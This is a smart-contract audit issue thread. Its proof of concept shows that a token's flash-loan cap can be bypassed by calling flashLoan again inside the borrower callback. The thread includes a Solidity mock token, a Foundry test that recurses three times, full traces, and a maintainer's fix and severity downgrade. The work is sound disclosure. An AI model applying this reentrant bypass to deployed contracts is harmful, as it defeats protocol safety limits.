### ISSUE TITLE
RToken `maxFlashLoan` cap can be sidestepped

### ISSUE THREAD

**Issue by GalloDaSballo** [raft-fi/contracts#324]
## Description
The cap on Flashloanable token is ineffective, we can sidestep it by repeatedly calling `flashLoan` during another flashloan

## Severity
Medium

Broken Invariant and bypassed check

## Attack scenario
By repeatedly performing a flashloan, an attacker can bypass the cap and mint as many tokens as they wish

Because slots will be warm the cost is negligible

Because X * Fees == sum(x_i) * Fees (where sum of all x_i == X), the fees are also not increasing meaning that the cap is sidestepped with no downside beside having to code an extra loop 

## Proof of Concept

The following POC demonstrates how, by borrowing the totalSupply, we can borrow again even mor
This could be repeated by extending the code until the desired leverage is reached.

Meaning that the check was fully sidestepped

Mock FL token, stripped out ERC20 with same logic for maxFlashLoan
```solidity
// SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

import {ERC20} from "openzeppelin-contracts/contracts/token/ERC20/ERC20.sol";
import {ERC20FlashMint, IERC3156FlashLender} from "openzeppelin-contracts/contracts/token/ERC20/extensions/ERC20FlashMint.sol";
import { Math } from "openzeppelin-contracts/contracts/utils/math/Math.sol";


contract RFlash is ERC20FlashMint{
    constructor() ERC20("R Stablecoin", "R") {
        _mint(address(1), 50e20);
    }

    function maxFlashLoan(address token)
        public
        view
        virtual
        override(ERC20FlashMint)
        returns (uint256)
    {
        return token == address(this) ? Math.min(totalSupply() / 10, ERC20FlashMint.maxFlashLoan(address(this))) : 0;
    }

}

```

Test File
```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.19;

import "forge-std/Test.sol";
import "../src/RFlash.sol";
import {IERC3156FlashBorrower} from "openzeppelin-contracts/contracts/token/ERC20/extensions/ERC20FlashMint.sol";




contract MaxMintLogger {
    RFlash public immutable flashToken;
    constructor(address _token) {
        flashToken = RFlash(_token);
    }


    event Debug(string name, uint256 val);
function onFlashLoan(
        address initiator,
        address,
        uint256 amount,
        uint256 fee,
        bytes calldata data
    ) public {
        emit Debug("New Max FlashLoan", flashToken.maxFlashLoan(address(flashToken)));
        emit Debug("New TotalSupply", flashToken.totalSupply());

        // If we FL Again we will double the supply again
    }
}
contract RTest is Test {
    RFlash public flashToken;
    MaxMintLogger public logger;

    function setUp() public {
        flashToken = new RFlash();
        logger = new MaxMintLogger(address(flashToken));
    }

    function test_base() public {
        flashToken.flashLoan(IERC3156FlashBorrower(address(logger)), address(flashToken), flashToken.maxFlashLoan(address(flashToken)), abi.encode(""));

    }
}

```

```solidity

  [49192] RTest::test_base() 
    ├─ [2933] RFlash::maxFlashLoan(RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   └─ ← 500000000000000000000 [5e20]
    ├─ [38149] RFlash::flashLoan(MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 500000000000000000000 [5e20], 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000) 
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], value: 500000000000000000000 [5e20])
    │   ├─ [6434] MaxMintLogger::onFlashLoan(RTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 500000000000000000000 [5e20], 0, 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000) 
    │   │   ├─ [933] RFlash::maxFlashLoan(RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← 550000000000000000000 [5.5e20]
    │   │   ├─ emit Debug(name: New Max FlashLoan, val: 550000000000000000000 [5.5e20])
    │   │   ├─ [349] RFlash::totalSupply() [staticcall]
    │   │   │   └─ ← 5500000000000000000000 [5.5e21]
    │   │   ├─ emit Debug(name: New TotalSupply, val: 5500000000000000000000 [5.5e21])
    │   │   └─ ← ()
    │   └─ ← "EvmError: Revert"
    └─ ← "EvmError: Revert"

Test result: FAILED. 0 passed; 1 failed; finished in 916.04µs
```

**Comment by GalloDaSballo** [comment]
Extended the test to show that this does work:

## Token
Set fee to 0 for simplicity
```solidity
// SPDX-License-Identifier: MIT
pragma solidity 0.8.19;

import {ERC20} from "openzeppelin-contracts/contracts/token/ERC20/ERC20.sol";
import {ERC20FlashMint, IERC3156FlashLender} from "openzeppelin-contracts/contracts/token/ERC20/extensions/ERC20FlashMint.sol";
import { Math } from "openzeppelin-contracts/contracts/utils/math/Math.sol";


contract RFlash is ERC20FlashMint{
    constructor() ERC20("R Stablecoin", "R") {
        _mint(msg.sender, 50e20);
    }

    function maxFlashLoan(address token)
        public
        view
        virtual
        override(ERC20FlashMint)
        returns (uint256)
    {
        return token == address(this) ? Math.min(totalSupply() / 10, ERC20FlashMint.maxFlashLoan(address(this))) : 0;
    }

    function _flashFee(address token, uint256 amount) internal view virtual override returns (uint256) { return 0; }

}

````

## Test
Fixed return value and we do loop 3 times
```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.19;

import "forge-std/Test.sol";
import "../src/RFlash.sol";
import {IERC3156FlashBorrower} from "openzeppelin-contracts/contracts/token/ERC20/extensions/ERC20FlashMint.sol";




contract MaxMintLogger {
    RFlash public immutable flashToken;

    uint256 count;
    constructor(address _token) {
        flashToken = RFlash(_token);

        flashToken.approve(address(flashToken), type(uint256).max);
    }


    event Debug(string name, uint256 val);
            bytes32 private constant _RETURN_VALUE = keccak256("ERC3156FlashBorrower.onFlashLoan");

function onFlashLoan(
        address initiator,
        address,
        uint256 amount,
        uint256 fee,
        bytes calldata data
    ) public returns (bytes32) {
        emit Debug("New Max FlashLoan", flashToken.maxFlashLoan(address(flashToken)));
        emit Debug("New TotalSupply", flashToken.totalSupply());
        emit Debug("New Bla", flashToken.balanceOf(address(this)));

        if(count < 3) {
            ++count;
            flashToken.flashLoan(IERC3156FlashBorrower(address(this)), address(flashToken), flashToken.maxFlashLoan(address(flashToken)), abi.encode(""));

        }
        return _RETURN_VALUE;

    }
}
contract RTest is Test {
    RFlash public flashToken;
    MaxMintLogger public logger;

    function setUp() public {
        flashToken = new RFlash();
        logger = new MaxMintLogger(address(flashToken));
        assertTrue(flashToken.balanceOf(address(this)) > 0, "bal)");
        flashToken.transfer(address(logger), flashToken.balanceOf(address(this)));
    }

    function test_base() public {
        flashToken.flashLoan(IERC3156FlashBorrower(address(logger)), address(flashToken), flashToken.maxFlashLoan(address(flashToken)), abi.encode(""));
    }
}

```


## LOGS
```solidity
Running 1 test for test/Counter.t.sol:RTest
[PASS] test_base() (gas: 115952)
Traces:
  [1330962] RTest::setUp() 
    ├─ [850616] → new RFlash@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: RTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5000000000000000000000 [5e21])
    │   └─ ← 3792 bytes of code
    ├─ [362708] → new MaxMintLogger@0x2e234DAe75C793f67A35089C9d99245E1C58470b
    │   ├─ [24646] RFlash::approve(RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) 
    │   │   ├─ emit Approval(owner: MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], spender: RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   └─ ← true
    │   └─ ← 1685 bytes of code
    ├─ [579] RFlash::balanceOf(RTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← 5000000000000000000000 [5e21]
    ├─ [579] RFlash::balanceOf(RTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← 5000000000000000000000 [5e21]
    ├─ [19991] RFlash::transfer(MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 5000000000000000000000 [5e21]) 
    │   ├─ emit Transfer(from: RTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], value: 5000000000000000000000 [5e21])
    │   └─ ← true
    └─ ← ()

  [115952] RTest::test_base() 
    ├─ [2933] RFlash::maxFlashLoan(RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   └─ ← 500000000000000000000 [5e20]
    ├─ [104741] RFlash::flashLoan(MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 500000000000000000000 [5e20], 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000) 
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], value: 500000000000000000000 [5e20])
    │   ├─ [92490] MaxMintLogger::onFlashLoan(RTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 500000000000000000000 [5e20], 0, 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000) 
    │   │   ├─ [933] RFlash::maxFlashLoan(RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← 550000000000000000000 [5.5e20]
    │   │   ├─ emit Debug(name: New Max FlashLoan, val: 550000000000000000000 [5.5e20])
    │   │   ├─ [349] RFlash::totalSupply() [staticcall]
    │   │   │   └─ ← 5500000000000000000000 [5.5e21]
    │   │   ├─ emit Debug(name: New TotalSupply, val: 5500000000000000000000 [5.5e21])
    │   │   ├─ [579] RFlash::balanceOf(MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b]) [staticcall]
    │   │   │   └─ ← 5500000000000000000000 [5.5e21]
    │   │   ├─ emit Debug(name: New Bla, val: 5500000000000000000000 [5.5e21])
    │   │   ├─ [933] RFlash::maxFlashLoan(RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   └─ ← 550000000000000000000 [5.5e20]
    │   │   ├─ [58631] RFlash::flashLoan(MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 550000000000000000000 [5.5e20], 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000) 
    │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], value: 550000000000000000000 [5.5e20])
    │   │   │   ├─ [50880] MaxMintLogger::onFlashLoan(MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 550000000000000000000 [5.5e20], 0, 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000) 
    │   │   │   │   ├─ [933] RFlash::maxFlashLoan(RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   │   └─ ← 605000000000000000000 [6.05e20]
    │   │   │   │   ├─ emit Debug(name: New Max FlashLoan, val: 605000000000000000000 [6.05e20])
    │   │   │   │   ├─ [349] RFlash::totalSupply() [staticcall]
    │   │   │   │   │   └─ ← 6050000000000000000000 [6.05e21]
    │   │   │   │   ├─ emit Debug(name: New TotalSupply, val: 6050000000000000000000 [6.05e21])
    │   │   │   │   ├─ [579] RFlash::balanceOf(MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b]) [staticcall]
    │   │   │   │   │   └─ ← 6050000000000000000000 [6.05e21]
    │   │   │   │   ├─ emit Debug(name: New Bla, val: 6050000000000000000000 [6.05e21])
    │   │   │   │   ├─ [933] RFlash::maxFlashLoan(RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   │   └─ ← 605000000000000000000 [6.05e20]
    │   │   │   │   ├─ [38921] RFlash::flashLoan(MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 605000000000000000000 [6.05e20], 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000) 
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], value: 605000000000000000000 [6.05e20])
    │   │   │   │   │   ├─ [31170] MaxMintLogger::onFlashLoan(MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 605000000000000000000 [6.05e20], 0, 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000) 
    │   │   │   │   │   │   ├─ [933] RFlash::maxFlashLoan(RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   │   │   │   └─ ← 665500000000000000000 [6.655e20]
    │   │   │   │   │   │   ├─ emit Debug(name: New Max FlashLoan, val: 665500000000000000000 [6.655e20])
    │   │   │   │   │   │   ├─ [349] RFlash::totalSupply() [staticcall]
    │   │   │   │   │   │   │   └─ ← 6655000000000000000000 [6.655e21]
    │   │   │   │   │   │   ├─ emit Debug(name: New TotalSupply, val: 6655000000000000000000 [6.655e21])
    │   │   │   │   │   │   ├─ [579] RFlash::balanceOf(MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b]) [staticcall]
    │   │   │   │   │   │   │   └─ ← 6655000000000000000000 [6.655e21]
    │   │   │   │   │   │   ├─ emit Debug(name: New Bla, val: 6655000000000000000000 [6.655e21])
    │   │   │   │   │   │   ├─ [933] RFlash::maxFlashLoan(RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   │   │   │   └─ ← 665500000000000000000 [6.655e20]
    │   │   │   │   │   │   ├─ [19211] RFlash::flashLoan(MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 665500000000000000000 [6.655e20], 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000) 
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], value: 665500000000000000000 [6.655e20])
    │   │   │   │   │   │   │   ├─ [9460] MaxMintLogger::onFlashLoan(MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 665500000000000000000 [6.655e20], 0, 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000) 
    │   │   │   │   │   │   │   │   ├─ [933] RFlash::maxFlashLoan(RFlash: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← 732050000000000000000 [7.32e20]
    │   │   │   │   │   │   │   │   ├─ emit Debug(name: New Max FlashLoan, val: 732050000000000000000 [7.32e20])
    │   │   │   │   │   │   │   │   ├─ [349] RFlash::totalSupply() [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← 7320500000000000000000 [7.32e21]
    │   │   │   │   │   │   │   │   ├─ emit Debug(name: New TotalSupply, val: 7320500000000000000000 [7.32e21])
    │   │   │   │   │   │   │   │   ├─ [579] RFlash::balanceOf(MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b]) [staticcall]
    │   │   │   │   │   │   │   │   │   └─ ← 7320500000000000000000 [7.32e21]
    │   │   │   │   │   │   │   │   ├─ emit Debug(name: New Bla, val: 7320500000000000000000 [7.32e21])
    │   │   │   │   │   │   │   │   └─ ← 0x439148f0bbc682ca079e46d6e2c2f0c1e3b820f1a291b069d8882abf8cf18dd9
    │   │   │   │   │   │   │   ├─ emit Transfer(from: MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], to: 0x0000000000000000000000000000000000000000, value: 665500000000000000000 [6.655e20])
    │   │   │   │   │   │   │   └─ ← true
    │   │   │   │   │   │   └─ ← 0x439148f0bbc682ca079e46d6e2c2f0c1e3b820f1a291b069d8882abf8cf18dd9
    │   │   │   │   │   ├─ emit Transfer(from: MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], to: 0x0000000000000000000000000000000000000000, value: 605000000000000000000 [6.05e20])
    │   │   │   │   │   └─ ← true
    │   │   │   │   └─ ← 0x439148f0bbc682ca079e46d6e2c2f0c1e3b820f1a291b069d8882abf8cf18dd9
    │   │   │   ├─ emit Transfer(from: MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], to: 0x0000000000000000000000000000000000000000, value: 550000000000000000000 [5.5e20])
    │   │   │   └─ ← true
    │   │   └─ ← 0x439148f0bbc682ca079e46d6e2c2f0c1e3b820f1a291b069d8882abf8cf18dd9
    │   ├─ emit Transfer(from: MaxMintLogger: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], to: 0x0000000000000000000000000000000000000000, value: 500000000000000000000 [5e20])
    │   └─ ← true
    └─ ← ()

Test result: ok. 1 passed; 0 failed; finished in 1.41ms
```

**Comment by mijovic** [comment]
Nice catch
Fixed by #326

**Comment by mijovic** [comment]
Downgraded severity to low as there are no economical losses here.
